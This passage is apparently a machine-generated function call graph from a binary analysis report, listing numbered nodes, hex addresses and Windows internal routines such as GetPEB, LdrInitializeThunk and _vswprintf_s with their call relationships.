19352->19286 19352->19297 19352->19324 19353->19356 19354 6eda80d 28 API calls 19357 6e73be4 19354->19357 19356->19352 19356->19354 19357->19357 19359 6ed1520 _vswprintf_s 19358->19359 19360 6e37d50 GetPEB 19359->19360 19361 6ed1543 19360->19361 19362 6ed1557 _vswprintf_s 19361->19362 19363 6ed1547 GetPEB 19361->19363 19364 6e5b640 _vswprintf_s 12 API calls 19362->19364 19363->19362 19365 6ed157c 19364->19365 19365->19252 19371 6e4aca2 19370->19371 19373 6e4ad10 19370->19373 19396 6e4acda 19371->19396 19415 6e596e0 LdrInitializeThunk 19371->19415 19375 6e4ad1e GetPEB 19373->19375 19416 6ec3c60 19373->19416 19376 6e4ad2c 19375->19376 19377 6e8a092 19375->19377 19381 6e4ad3c 19376->19381 19386 6e89fa0 GetPEB 19376->19386 19379 6e8a0ba 19377->19379 19380 6e8a09d GetPEB 19377->19380 19384 6e1b150 _vswprintf_s 12 API calls 19379->19384 19383 6e1b150 _vswprintf_s 12 API calls 19380->19383 19388 6e4ad47 GetPEB 19381->19388 19389 6e89fb3 GetPEB 19381->19389 19387 6e8a0b7 19383->19387 19384->19387 19385 6e89f90 19385->19375 19386->19381 19392 6e1b150 _vswprintf_s 12 API calls 19387->19392 19390 6e89fda 19388->19390 19391 6e4ad73 19388->19391 19389->19388 19393 6e89fc6 19389->19393 19390->19391 19395 6e89fe3 GetPEB 19390->19395 19398 6e4ad7e GetPEB 19391->19398 19399 6e89ff6 GetPEB 19391->19399 19392->19396 19394 6ed14fb 14 API calls 19393->19394 19397 6e89fd5 19394->19397 19395->19391 19396->19334 19397->19388 19401 6e4ad94 19398->19401 19402 6e8a042 19398->19402 19399->19398 19400 6e8a009 19399->19400 19403 6e37d50 GetPEB 19400->19403 19401->19396 19408 6e37d50 GetPEB 19401->19408 19402->19401 19404 6e8a04b GetPEB 19402->19404 19405 6e8a00e 19403->19405 19404->19401 19406 6e8a021 19405->19406 19407 6e8a012 GetPEB 19405->19407 19410 6ed1411 12 API calls 19406->19410 19407->19406 19409 6e8a063 19408->19409 19411 6e8a076 19409->19411 19412 6e8a067 GetPEB 19409->19412 19413 6e8a03d 19410->19413 19414 6ed1411 12 API calls 19411->19414 19412->19411 19413->19398 19414->19377 19415->19373 19417 6e89f74 19416->19417 19419 6ec3c78 19416->19419 19417->19375 19420 6e596e0 LdrInitializeThunk 19417->19420 19419->19417 19421 6ec3d40 19419->19421 19420->19385 19422 6ec3d7f 19421->19422 19423 6ec3e55 19422->19423 19426 6ec3e37 GetPEB 19422->19426 19424 6e5b640 _vswprintf_s 12 API calls 19423->19424 19425 6ec3e65 19424->19425 19425->19417 19426->19422 19428 6e193df 19427->19428 19429 6e193e3 19427->19429 19428->19343 19430 6e3bc04 28 API calls 19429->19430 19430->19428 19432 6e198a0 19431->19432 19433 6e198a4 19431->19433 19432->19356 19434 6e3e4a0 28 API calls 19433->19434 19434->19432 19435->18946 19436->18987 19437->18988 19438 6ed02f7 19439 6ed0323 19438->19439 19441 6ed03b0 19439->19441 19452 6ed0a28 19439->19452 19442 6ed03d1 19441->19442 19486 6edbcd2 19441->19486 19443 6ed0342 19443->19441 19456 6edbbbb 19443->19456 19446 6ed035f 19446->19441 19465 6eedfce 19446->19465 19453 6ed0a4d 19452->19453 19454 6ed0a57 19452->19454 19453->19443 19490 6e44e70 19454->19490 19457 6edbbde 19456->19457 19496 6edbd54 19457->19496 19460 6edbc3c 19460->19446 19461 6edbc3e 19510 6edaa16 19461->19510 19462 6edbc17 19500 6edf9a1 19462->19500 19468 6eedff0 19465->19468 19470 6eee19d 19465->19470 19466 6e5b640 _vswprintf_s 12 API calls 19467 6ed0388 19466->19467 19467->19441 19473 6ed03da 19467->19473 19468->19470 20196 6eee62a 19468->20196 19470->19466 19472 6eee1cd 19472->19470 20204 6eee5b6 19472->20204 19474 6edbbbb 267 API calls 19473->19474 19476 6ed0404 19474->19476 19475 6ed039a 19475->19441 19482 6eee4b3 19475->19482 19476->19475 19477 6ed058b 19476->19477 20218 6ed0150 19476->20218 19477->19475 19478 6edbcd2 256 API calls 19477->19478 19478->19475 19483 6eee4c9 19482->19483 19484 6eee5b6 12 API calls 19483->19484 19485 6eee5a7 19483->19485 19484->19485 19485->19441 19487 6edbceb 19486->19487 20224 6edae44 19487->20224 19491 6e44e94 19490->19491 19495 6e44ec0 19490->19495 19492 6e5b640 _vswprintf_s 12 API calls 19491->19492 19493 6e44eac 19492->19493 19493->19453 19494 6ec8df1 13 API calls 19494->19491 19495->19491 19495->19494 19497 6edbc04 19496->19497 19498 6edbd63 19496->19498 19497->19460 19497->19461 19497->19462 19499 6e44e70 13 API calls 19498->19499 19499->19497 19501 6edf9d6 19500->19501 19522 6ee022c 19501->19522 19503 6edf9e1 19504 6edf9e7 19503->19504 19505 6edfa16 19503->19505 19528 6ee05ac 19503->19528 19504->19460 19508 6edfa1a _vswprintf_s 19505->19508 19544 6ee070d 19505->19544 19508->19504 19558 6ee0a13 19508->19558 19511 6edaa44 19510->19511 19517 6edaa66 19511->19517 20016 6edab54 19511->20016 19512 6e37d50 GetPEB 19514 6edab0f 19512->19514 19515 6edab23 19514->19515 19516 6edab13 GetPEB 19514->19516 19518 6edab2d GetPEB 19515->19518 19519 6edab49 19515->19519 19516->19515 19517->19512 19518->19519 19520 6edab3c 19518->19520 19519->19460 20028 6ed131b 19520->20028 19523 6ee0278 19522->19523 19527 6ee02c2 19523->19527 19566 6ee0ea5 19523->19566 19525 6ee02e9 19525->19503 19527->19525 19593 6e6cf85 19527->19593 19532 6ee05d1 19528->19532 19529 6ee06db 19529->19505 19530 6ee0652 19531 6eda854 33 API calls 19530->19531 19534 6ee0672 19531->19534 19532->19529 19532->19530 19533 6eda80d 28 API calls 19532->19533 19533->19530 19534->19529 19740 6ee1293 19534->19740 19537 6e37d50 GetPEB 19538 6ee069c 19537->19538 19539 6ee06b0 19538->19539 19540 6ee06a0 GetPEB 19538->19540 19539->19529 19541 6ee06ba GetPEB 19539->19541 19540->19539 19541->19529 19542 6ee06c9 19541->19542 19543 6ed138a 14 API calls 19542->19543 19543->19529 19545 6ee0734 19544->19545 19546 6ee07d2 19545->19546 19547 6edafde 33 API calls 19545->19547 19546->19508 19548 6ee0782 19547->19548 19549 6ee1293 33 API calls 19548->19549 19550 6ee078e 19549->19550 19551 6e37d50 GetPEB 19550->19551 19552 6ee0793 19551->19552 19553 6ee07a7 19552->19553 19554 6ee0797 GetPEB 19552->19554 19553->19546 19555 6ee07b1 GetPEB 19553->19555 19554->19553 19555->19546 19556 6ee07c0 19555->19556 19557 6ed14fb 14 API calls 19556->19557 19557->19546 19559 6ee0a3c 19558->19559 19744 6ee0392 19559->19744 19562 6e6cf85 33 API calls 19563 6ee0aec 19562->19563 19564 6ee0b19 19563->19564 19565 6ee1074 35 API calls 19563->19565 19564->19504 19565->19564 19597 6edff69 19566->19597 19568 6ee105b 19570 6ee1055 19568->19570 19621 6ee1074 19568->19621 19569 6ee0f32 19603 6eda854 19569->19603 19570->19527 19573 6ee0fab 19577 6e37d50 GetPEB 19573->19577 19574 6ee0ecb 19574->19568 19574->19569 19575 6eda80d 28 API calls 19574->19575 19575->19569 19578 6ee0fcf 19577->19578 19580 6ee0fe3 19578->19580 19581 6ee0fd3 GetPEB 19578->19581 19579 6ee0f50 19579->19568 19579->19573 19611 6ee15b5 19579->19611 19582 6ee100e 19580->19582 19583 6ee0fed GetPEB 19580->19583 19581->19580 19584 6e37d50 GetPEB 19582->19584 19583->19582 19585 6ee0ffc 19583->19585 19587 6ee1013 19584->19587 19586 6ed138a 14 API calls 19585->19586 19586->19582 19588 6ee1027 19587->19588 19589 6ee1017 GetPEB 19587->19589 19590 6ee1041 19588->19590 19591 6ecfec0 14 API calls 19588->19591 19589->19588 19590->19570 19615 6ed52f8 19590->19615 19591->19590 19595 6e6cf98 19593->19595 19594 6e6cfb1 19594->19525 19595->19594 19596 6ed52f8 33 API calls 19595->19596 19596->19594 19599 6edff9f 19597->19599 19602 6edffd1 19597->19602 19598 6eda854 33 API calls 19600 6edfff1 19598->19600 19601 6eda80d 28 API calls 19599->19601 19599->19602 19600->19574 19601->19602 19602->19598 19604 6eda8c0 19603->19604 19606 6eda941 19603->19606 19604->19606 19633 6edf021 19604->19633 19607 6edaa00 19606->19607 19637 6ed53d9 19606->19637 19609 6e5b640 _vswprintf_s 12 API calls 19607->19609 19610 6edaa10 19609->19610 19610->19579 19612 6ee15d0 19611->19612 19614 6ee15d7 19611->19614 19613 6ee165e LdrInitializeThunk 19612->19613 19613->19614 19614->19579 19616 6ed53c7 19615->19616 19617 6ed5321 19615->19617 19619 6e5b640 _vswprintf_s 12 API calls 19616->19619 19618 6e97b9c 33 API calls 19617->19618 19618->19616 19620 6ed53d5 19619->19620 19620->19570 19622 6ee1095 19621->19622 19623 6ee10b0 19621->19623 19624 6ee165e LdrInitializeThunk 19622->19624 19698 6edafde 19623->19698 19624->19623 19627 6e37d50 GetPEB 19628 6ee10cd 19627->19628 19629 6ee10e1 19628->19629 19630 6ee10d1 GetPEB 19628->19630 19631 6ee10fa 19629->19631 19707 6ecfe3f 19629->19707 19630->19629 19631->19570 19634 6edf03a 19633->19634 19651 6edee22 19634->19651 19638 6ed53f7 19637->19638 19639 6ed5552 19637->19639 19640 6ed54eb 19638->19640 19641 6ed5403 19638->19641 19643 6e97b9c 33 API calls 19639->19643 19649 6ed547c 19639->19649 19646 6e97b9c 33 API calls 19640->19646 19640->19649 19644 6ed5481 19641->19644 19647 6ed540b 19641->19647 19642 6e5b640 _vswprintf_s 12 API calls 19645 6ed55bd 19642->19645 19643->19649 19648 6e97b9c 33 API calls 19644->19648 19644->19649 19645->19607 19646->19649 19647->19649 19682 6e97b9c 19647->19682 19648->19649 19649->19642 19652 6edee5d 19651->19652 19653 6edee73 19652->19653 19655 6edef09 19652->19655 19661 6edeef5 19653->19661 19662 6edf607 19653->19662 19654 6e5b640 _vswprintf_s 12 API calls 19656 6edefd4 19654->19656 19655->19661 19667 6edf8c5 19655->19667 19656->19606 19661->19654 19665 6edf626 19662->19665 19663 6edeedd 19663->19661 19666 6e596e0 LdrInitializeThunk 19663->19666 19665->19663 19673 6ee165e 19665->19673 19666->19661 19668 6edf8ea 19667->19668 19669 6edf932 19668->19669 19670 6edf607 LdrInitializeThunk 19668->19670 19669->19661 19671 6edf90f 19670->19671 19671->19669 19681 6e596e0 LdrInitializeThunk 19671->19681 19676 6ee166a _vswprintf_s 19673->19676 19674 6ee1869 _vswprintf_s 19674->19665 19676->19674 19677 6ee1d55 19676->19677 19678 6ee1d61 _vswprintf_s 19677->19678 19679 6ee1fc5 _vswprintf_s 19678->19679 19680 6e596e0 _vswprintf_s LdrInitializeThunk 19678->19680 19679->19676 19680->19679 19681->19669 19685 6e51130 19682->19685 19688 6e5115f 19685->19688 19689 6e8cd96 19688->19689 19690 6e511a8 19688->19690 19690->19689 19692 6e8cd9d 19690->19692 19696 6e511e9 _vswprintf_s 19690->19696 19691 6e5b640 _vswprintf_s 12 API calls 19694 6e51159 19691->19694 19693 6e512bd 19692->19693 19695 6ee5ba5 33 API calls 19692->19695 19693->19689 19693->19691 19694->19649 19695->19693 19696->19693 19697 6e1ccc0 _vswprintf_s 12 API calls 19696->19697 19697->19693 19699 6edb039 19698->19699 19700 6edb00a 19698->19700 19701 6edb035 19699->19701 19724 6e596e0 LdrInitializeThunk 19699->19724 19700->19699 19703 6edb00e 19700->19703 19704 6edb026 19701->19704 19706 6ed53d9 33 API calls 19701->19706 19703->19704 19715 6edf209 19703->19715 19704->19627 19706->19704 19708 6ecfe64 _vswprintf_s 19707->19708 19709 6e37d50 GetPEB 19708->19709 19710 6ecfe81 19709->19710 19711 6ecfe85 GetPEB 19710->19711 19712 6ecfe95 _vswprintf_s 19710->19712 19711->19712 19713 6e5b640 _vswprintf_s 12 API calls 19712->19713 19714 6ecfeba 19713->19714 19714->19631 19716 6edf23b 19715->19716 19717 6edf27a 19716->19717 19718 6edf241 19716->19718 19723 6edf28f _vswprintf_s 19717->19723 19726 6e596e0 LdrInitializeThunk 19717->19726 19725 6e596e0 LdrInitializeThunk 19718->19725 19722 6edf26d 19722->19701 19723->19722 19727 6edf7dd 19723->19727 19724->19701 19725->19722 19726->19723 19728 6edf803 19727->19728 19733 6edf4a1 19728->19733 19732 6edf82d 19732->19722 19734 6edf4bc 19733->19734 19735 6ee165e LdrInitializeThunk 19734->19735 19737 6edf4ea 19735->19737 19736 6edf51c 19739 6e596e0 LdrInitializeThunk 19736->19739 19737->19736 19738 6ee165e LdrInitializeThunk 19737->19738 19738->19737 19739->19732 19741 6ee0697 19740->19741 19742 6ee12b2 19740->19742 19741->19537 19743 6ed52f8 33 API calls 19742->19743 19743->19741 19747 6ee03a0 19744->19747 19745 6ee0589 19745->19562 19746 6ee070d 36 API calls 19746->19747 19747->19745 19747->19746 19749 6ebda47 19747->19749 19750 6ebda9b 19749->19750 19751 6ebda51 19749->19751 19750->19747 19751->19750 19755 6e3c4a0 19751->19755 19772 6e3c577 19755->19772 19757 6e5b640 _vswprintf_s 12 API calls 19759 6e3c545 19757->19759 19758 6e3c4cc 19765 6e3c52c 19758->19765 19780 6e3c182 19758->19780 19759->19750 19766 6ed526e 19759->19766 19761 6e3c515 19761->19765 19791 6e3dbe9 19761->19791 19762 6e3c4f9 19762->19761 19762->19765 19809 6e3e180 19762->19809 19765->19757 19767 6ed528d 19766->19767 19768 6ed52a4 19766->19768 19769 6e97b9c 33 API calls 19767->19769 19770 6e5b640 _vswprintf_s 12 API calls 19768->19770 19769->19768 19771 6ed52af 19770->19771 19771->19750 19773 6e3c5b5 19772->19773 19777 6e3c583 19772->19777 19774 6e3c5bb GetPEB 19773->19774 19775 6e3c5ce 19773->19775 19774->19775 19779 6e3c5ad 19774->19779 19776 6ee88f5 33 API calls 19775->19776 19776->19779 19777->19773 19778 6e3c59e GetPEB 19777->19778 19778->19773 19778->19779 19779->19758 19781 6e3c1c4 19780->19781 19784 6e3c1a2 19780->19784 19782 6e37d50 GetPEB 19781->19782 19783 6e3c1dc 19782->19783 19785 6e3c1e4 19783->19785 19786 6e82d65 GetPEB 19783->19786 19784->19762 19787 6e82d78 19785->19787 19789 6e3c1f2 19785->19789 19786->19787 19830 6ee8d34 19787->19830 19789->19784 19812 6e3b944 19789->19812 19792 6e3dc05 19791->19792 19800 6e3dc54 19792->19800 19859 6e14510 19792->19859 19793 6e37d50 GetPEB 19795 6e3dd10 19793->19795 19797 6e83aff GetPEB 19795->19797 19798 6e3dd18 19795->19798 19801 6e83b12 19797->19801 19798->19801 19802 6e3dd29 19798->19802 19799 6e1cc50 33 API calls 19799->19800 19800->19793 19867 6ee8ed6 19801->19867 19851 6e3dd82 19802->19851 19810 6e3c577 35 API calls 19809->19810 19811 6e3e198 19810->19811 19811->19761 19813 6e3badd 19812->19813 19827 6e3b980 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 19812->19827 19815 6e37d50 GetPEB 19813->19815 19820 6e3bab7 19813->19820 19814 6e5b640 _vswprintf_s 12 API calls 19816 6e3bad9 19814->19816 19817 6e3baee 19815->19817 19816->19784 19818 6e82caf GetPEB 19817->19818 19821 6e3baf6 19817->19821 19824 6e82cc2 GetPEB 19818->19824 19819 6e37d50 GetPEB 19822 6e3baa1 19819->19822 19820->19814 19821->19820 19837 6ee8cd6 19821->19837 19822->19824 19825 6e3baa9 19822->19825 19826 6e82cd5 19824->19826 19825->19820 19825->19826 19827->19819 19827->19820 19831 6e37d50 GetPEB 19830->19831 19832 6ee8d5a 19831->19832 19833 6ee8d5e GetPEB 19832->19833 19834 6ee8d6e _vswprintf_s 19832->19834 19833->19834 19835 6e5b640 _vswprintf_s 12 API calls 19834->19835 19836 6ee8d91 19835->19836 19836->19784 19860 6e1458f 19859->19860 19861 6e14523 19859->19861 19860->19799 19861->19860 19862 6e1b150 _vswprintf_s 12 API calls 19861->19862 19863 6e708f7 19862->19863 19864 6e1b150 _vswprintf_s 12 API calls 19863->19864 19865 6e70901 19864->19865 20017 6edab79 20016->20017 20024 6edab88 20016->20024 20035 6edcac9 20017->20035 20019 6edaba4 20041 6ee28ec 20019->20041 20020 6edabb1 20022 6edabb6 20020->20022 20023 6edabc1 20020->20023 20025 6edf9a1 255 API calls 20022->20025 20050 6ede539 20023->20050 20024->20019 20024->20020 20027 6edab8f 20024->20027 20025->20027 20027->19517 20029 6e37d50 GetPEB 20028->20029 20030 6ed134d 20029->20030 20031 6ed1351 GetPEB 20030->20031 20032 6ed1361 _vswprintf_s 20030->20032 20031->20032 20033 6e5b640 _vswprintf_s 12 API calls 20032->20033 20034 6ed1384 20033->20034 20034->19519 20036 6edcadd 20035->20036 20037 6edcafc 20036->20037 20071 6edc8f7 20036->20071 20040 6edcb00 _vswprintf_s 20037->20040 20075 6edd12f 20037->20075 20040->20024 20048 6ee2908 20041->20048 20043 6ee29f5 20044 6ee2a8c 20043->20044 20045 6ee2a60 20043->20045 20178 6ee25dd 20044->20178 20046 6eda80d 28 API calls 20045->20046 20049 6ee2a70 _vswprintf_s 20046->20049 20048->20043 20048->20049 20174 6ee3149 20048->20174 20049->20027 20051 6edbbbb 266 API calls 20050->20051 20059 6ede567 20051->20059 20052 6ede635 20053 6ede804 20052->20053 20055 6edafde 33 API calls 20052->20055 20053->20027 20054 6ede618 20054->20052 20058 6edbcd2 256 API calls 20054->20058 20055->20053 20056 6ede5f6 20057 6eda854 33 API calls 20056->20057 20064 6ede614 20057->20064 20058->20052 20059->20052 20059->20054 20059->20056 20061 6eda80d 28 API calls 20059->20061 20060 6ede68f 20062 6eda854 33 API calls 20060->20062 20061->20056 20065 6ede6ae 20062->20065 20063 6eda80d 28 API calls 20063->20060 20064->20054 20064->20060 20064->20063 20065->20054 20066 6e37d50 GetPEB 20065->20066 20067 6ede7a8 20066->20067 20068 6ede7ac GetPEB 20067->20068 20069 6ede7c0 20067->20069 20068->20069 20069->20053 20070 6ecfec0 14 API calls 20069->20070 20070->20054 20072 6edc94b 20071->20072 20073 6edc915 20071->20073 20072->20037 20073->20072 20091 6edc43e 20073->20091 20082 6edd15d 20075->20082 20076 6edd29e 20101 6edd38e 20076->20101 20078 6edd2ac 20085 6edd2c1 20078->20085 20106 6eddbd2 20078->20106 20081 6edd2d8 20083 6edd38e 13 API calls 20081->20083 20082->20076 20082->20081 20082->20085 20095 6edd616 20082->20095 20088 6edd2e8 20083->20088 20084 6edd31c 20087 6edd330 20084->20087 20121 6edc52d 20084->20121 20085->20084 20115 6edc7a2 20085->20115 20087->20040 20088->20085 20090 6eddbd2 243 API calls 20088->20090 20090->20085 20092 6edc46c _vswprintf_s 20091->20092 20093 6e5b640 _vswprintf_s 12 API calls 20092->20093 20094 6edc529 20093->20094 20094->20072 20100 6edd651 20095->20100 20096 6edd757 20097 6e5b640 _vswprintf_s 12 API calls 20096->20097 20098 6edd85e 20097->20098 20098->20082 20100->20096 20125 6eddef6 20100->20125 20143 6e1774a 20101->20143 20103 6edd3d2 20105 6edd419 20103->20105 20148 6edd466 20103->20148 20105->20078 20108 6eddc12 20106->20108 20112 6eddd1f 20106->20112 20107 6eddcca 20107->20085 20108->20107 20109 6eddcd1 20108->20109 20110 6eddcb2 20108->20110 20109->20112 20152 6edd8df 20109->20152 20111 6eda80d 28 API calls 20110->20111 20111->20107 20112->20107 20113 6edc52d 228 API calls 20112->20113 20113->20107 20116 6edc7c6 _vswprintf_s 20115->20116 20120 6edc863 20116->20120 20158 6edc59e 20116->20158 20117 6e5b640 _vswprintf_s 12 API calls 20118 6edc87f 20117->20118 20118->20084 20120->20117 20124 6edc548 20121->20124 20122 6edc595 20122->20087 20124->20122 20162 6eddb14 20124->20162 20126 6eddfe8 20125->20126 20129 6eda6b3 20126->20129 20134 6e41164 20129->20134 20132 6e41164 13 API calls 20133 6eda6d7 20132->20133 20133->20096 20135 6e85490 20134->20135 20139 6e4117f 20134->20139 20137 6e59670 _vswprintf_s LdrInitializeThunk 20135->20137 20137->20139 20140 6e45720 20139->20140 20141 6e44e70 13 API calls 20140->20141 20142 6e41185 20141->20142 20142->20132 20144 6e1777a 20143->20144 20145 6e728d8 20143->20145 20144->20103 20146 6e41164 13 API calls 20145->20146 20147 6e728dd 20146->20147 20149 6edd4bc 20148->20149 20150 6e5b640 _vswprintf_s 12 API calls 20149->20150 20151 6edd591 20150->20151 20151->20105 20155 6edd917 20152->20155 20153 6e5b640 _vswprintf_s 12 API calls 20154 6edda95 20153->20154 20154->20112 20156 6edd96d 20155->20156 20157 6ebda47 228 API calls 20155->20157 20156->20153 20157->20156 20159 6edc5c9 20158->20159 20160 6e5b640 _vswprintf_s 12 API calls 20159->20160 20161 6edc5f9 20160->20161 20161->20120 20163 6eddb4f 20162->20163 20164 6eddbae 20162->20164 20166 6e5b640 _vswprintf_s 12 API calls 20163->20166 20168 6edc95a 20164->20168 20167 6eddbcc 20166->20167 20167->20122 20169 6edc9e8 20168->20169 20171 6edc99f 20168->20171 20170 6edd8df 228 API calls 20169->20170 20170->20171 20172 6e5b640 _vswprintf_s 12 API calls 20171->20172 20173 6edca15 20172->20173 20173->20163 20177 6ee3169 20174->20177 20175 6e5b640 _vswprintf_s 12 API calls 20176 6ee31ce 20175->20176 20176->20048 20177->20175 20179 6ee2603 20178->20179 20182 6ee27a5 20179->20182 20184 6ee2fbd 20179->20184 20180 6ee286b 20180->20049 20182->20180 20188 6ee241a 20182->20188 20185 6ee2fe4 20184->20185 20186 6e5b640 _vswprintf_s 12 API calls 20185->20186 20187 6ee30f0 20186->20187 20187->20182 20189 6ee242f 20188->20189 20191 6ee246c 20189->20191 20192 6ee22ae 20189->20192 20191->20180 20193 6ee22dd 20192->20193 20194 6ee2fbd 12 API calls 20193->20194 20195 6ee23ee 20193->20195 20194->20195 20195->20189 20201 6eee667 _vswprintf_s 20196->20201 20197 6eee66f 20198 6e5b640 _vswprintf_s 12 API calls 20197->20198 20199 6eee725 20198->20199 20199->19472 20200 6eee704 20200->20197 20202 6eee5b6 12 API calls 20200->20202 20201->20197 20201->20200 20210 6eee824 20201->20210 20202->20197 20205 6eee608 20204->20205 20206 6eee5e1 20204->20206 20208 6e5b640 _vswprintf_s 12 API calls 20205->20208 20206->20205 20214 6eeed52 20206->20214 20209 6eee626 20208->20209 20209->19470 20213 6eee853 _vswprintf_s 20210->20213 20211 6e5b640 _vswprintf_s 12 API calls 20212 6eeed3b 20211->20212 20212->20201 20213->20211 20217 6eeed73 20214->20217 20215 6e5b640 _vswprintf_s 12 API calls 20216 6eeee6d 20215->20216 20216->20206 20217->20215 20219 6edbbbb 267 API calls 20218->20219 20220 6ed016d 20219->20220 20220->19477 20221 6ed0180 20220->20221 20222 6edbcd2 256 API calls 20221->20222 20223 6ed0199 20222->20223 20223->19477 20225 6edae6a 20224->20225 20229 6edaf27 20225->20229 20230 6edaf3d 20225->20230 20234 6edaf38 20225->20234 20226 6edaf6c 20242 6edea55 20226->20242 20227 6edafc3 20264 6edfde2 20227->20264 20233 6eda80d 28 API calls 20229->20233 20230->20226 20230->20227 20233->20234 20234->19442 20235 6e37d50 GetPEB 20236 6edaf85 20235->20236 20237 6edaf99 20236->20237 20238 6edaf89 GetPEB 20236->20238 20237->20234 20239 6edafa3 GetPEB 20237->20239 20238->20237 20239->20234 20240 6edafb2 20239->20240 20240->20234 20257 6ed1608 20240->20257 20243 6edea74 20242->20243 20244 6edea8d 20243->20244 20247 6edeab0 20243->20247 20245 6eda80d 28 API calls 20244->20245 20246 6edaf7a 20245->20246 20246->20235 20248 6edafde 33 API calls 20247->20248 20249 6edeb12 20248->20249 20250 6edbcd2 255 API calls 20249->20250 20251 6edeb3d 20250->20251 20252 6e37d50 GetPEB 20251->20252 20253 6edeb48 20252->20253 20254 6edeb4c GetPEB 20253->20254 20255 6edeb60 20253->20255 20254->20255 20255->20246 20256 6ecfe3f 14 API calls 20255->20256 20256->20246 20258 6e37d50 GetPEB 20257->20258 20259 6ed1634 20258->20259 20260 6ed1638 GetPEB 20259->20260 20261 6ed1648 _vswprintf_s 20259->20261 20260->20261 20262 6e5b640 _vswprintf_s 12 API calls 20261->20262 20263 6ed166b 20262->20263 20263->20234 20265 6edfdf5 20264->20265 20266 6edfdfe 20265->20266 20267 6edfe12 20265->20267 20268 6eda80d 28 API calls 20266->20268 20269 6edfebd 20267->20269 20270 6edfe2c 20267->20270 20271 6edfe0d 20268->20271 20274 6ee0a13 233 API calls 20269->20274 20272 6edfe45 20270->20272 20273 6edfe35 20270->20273 20271->20234 20293 6ee2b28 20272->20293 20275 6eddbd2 243 API calls 20273->20275 20277 6edfecb 20274->20277 20280 6edfe41 20275->20280 20279 6e37d50 GetPEB 20277->20279 20278 6edfe55 20278->20280 20285 6edc8f7 12 API calls 20278->20285 20281 6edfed3 20279->20281 20284 6e37d50 GetPEB 20280->20284 20282 6edfee7 20281->20282 20283 6edfed7 GetPEB 20281->20283 20282->20271 20287 6edfef1 GetPEB 20282->20287 20283->20282 20286 6edfe77 20284->20286 20285->20280 20288 6edfe8b 20286->20288 20289 6edfe7b GetPEB 20286->20289 20287->20271 20292 6edfea4 20287->20292 20288->20271 20290 6edfe95 GetPEB 20288->20290 20289->20288 20290->20271 20290->20292 20291 6ed1608 14 API calls 20291->20271 20292->20271 20292->20291 20297 6ee2b46 20293->20297 20294 6ee2bbf 20296 6eda80d 28 API calls 20294->20296 20295 6ee2bd3 20298 6ee2c36 20295->20298 20299 6ee2c15 20295->20299 20303 6ee2bce 20296->20303 20297->20294 20297->20295 20300 6ee241a 12 API calls 20298->20300 20301 6eda80d 28 API calls 20299->20301 20302 6ee2c4a 20300->20302 20301->20303 20302->20303 20305 6ee3209 20302->20305 20303->20278 20306 6ee3240 20305->20306 20307 6e5b640 _vswprintf_s 12 API calls 20306->20307 20308 6ee324d 20307->20308 20308->20303 20309 6e19240 20310 6e1924c _vswprintf_s 20309->20310 20311 6e1925f 20310->20311 20327 6e595d0 LdrInitializeThunk 20310->20327 20328 6e19335 20311->20328 20315 6e19335 LdrInitializeThunk 20316 6e19276 20315->20316 20333 6e595d0 LdrInitializeThunk 20316->20333 20318 6e1927e GetPEB 20319 6e377f0 20318->20319 20320 6e1929a GetPEB 20319->20320 20321 6e377f0 20320->20321 20322 6e192b6 GetPEB 20321->20322 20324 6e192d2 20322->20324 20323 6e19330 20324->20323 20325 6e19305 GetPEB 20324->20325 20326 6e1931f _vswprintf_s 20325->20326 20327->20311 20334 6e595d0 LdrInitializeThunk 20328->20334 20330 6e19342 20335 6e595d0 LdrInitializeThunk 20330->20335 20332 6e1926b 20332->20315 20333->20318 20334->20330 20335->20332 18679 6e59540 LdrInitializeThunk 20358 6ed2d82 20359 6ed2d8e _vswprintf_s 20358->20359 20362 6ed2da6 20359->20362 20406 6e140e1 20359->20406 20364 6e6d130 _vswprintf_s 12 API calls 20362->20364 20365 6ed30c1 20364->20365 20366 6ed3027 GetPEB 20367 6ed304f 20366->20367 20368 6ed3032 GetPEB 20366->20368 20371 6e1b150 _vswprintf_s 12 API calls 20367->20371 20370 6e1b150 _vswprintf_s 12 API calls 20368->20370 20369 6ed2e29 20372 6ed2e38 20369->20372 20374 6e2eef0 27 API calls 20369->20374 20373 6ed304c 20370->20373 20371->20373 20421 6ed4496 20372->20421 20375 6e1b150 _vswprintf_s 12 API calls 20373->20375 20374->20372 20377 6ed2f7c 20375->20377 20513 6ed30c4 20377->20513 20378 6ed2e53 20485 6ed49a4 20378->20485 20381 6ecfa2b 28 API calls 20382 6ed2eab 20381->20382 20383 6ed2ecc 20382->20383 20388 6e416c7 LdrInitializeThunk 20382->20388 20384 6ed2f18 GetPEB 20383->20384 20385 6ed4496 127 API calls 20383->20385 20386 6ed2f29 20384->20386 20387 6ed2f95 20384->20387 20385->20384 20389 6ed2f2e GetPEB 20386->20389 20390 6ed2f4b 20386->20390 20387->20377 20394 6ed2fd0 GetPEB 20387->20394 20388->20383 20391 6e1b150 _vswprintf_s 12 API calls 20389->20391 20392 6e1b150 _vswprintf_s 12 API calls 20390->20392 20393 6ed2f48 20391->20393 20392->20393 20395 6e1b150 _vswprintf_s 12 API calls 20393->20395 20397 6ed2ff8 20394->20397 20398 6ed2fdb GetPEB 20394->20398 20396 6ed2f69 GetPEB 20395->20396 20396->20377 20401 6e1b150 _vswprintf_s 12 API calls 20397->20401 20400 6e1b150 _vswprintf_s 12 API calls 20398->20400 20402 6ed2ff5 20400->20402 20401->20402 20505 6ebd455 20402->20505 20404 6ed300e 20405 6e1b150 _vswprintf_s 12 API calls 20404->20405 20405->20396 20407 6e70423 GetPEB 20406->20407 20408 6e140f7 20406->20408 20409 6e7042f GetPEB 20407->20409 20410 6e7044c 20407->20410 20408->20366 20408->20369 20408->20377 20411 6e1b150 _vswprintf_s 12 API calls 20409->20411 20412 6e1b150 _vswprintf_s 12 API calls 20410->20412 20413 6e70449 20411->20413 20412->20413 20414 6e1b150 _vswprintf_s 12 API calls 20413->20414 20415 6e70462 20414->20415 20416 6e1b150 _vswprintf_s 12 API calls 20415->20416 20418 6e70473 20415->20418 20416->20418 20417 6e1b150 _vswprintf_s 12 API calls 20419 6e7047f GetPEB 20417->20419 20418->20417 20420 6e7048c 20419->20420 20422 6ed49a4 16 API calls 20421->20422 20429 6ed44b7 20422->20429 20423 6ed47f2 GetPEB 20424 6ed47fe 20423->20424 20425 6ed4738 20424->20425 20426 6e4174b 13 API calls 20424->20426 20425->20378 20426->20425 20427 6ed4564 20436 6ed459f 20427->20436 20517 6e59660 LdrInitializeThunk 20427->20517 20428 6ed4697 GetPEB 20432 6ed46c0 20428->20432 20433 6ed46a3 GetPEB 20428->20433 20429->20423 20429->20425 20429->20427 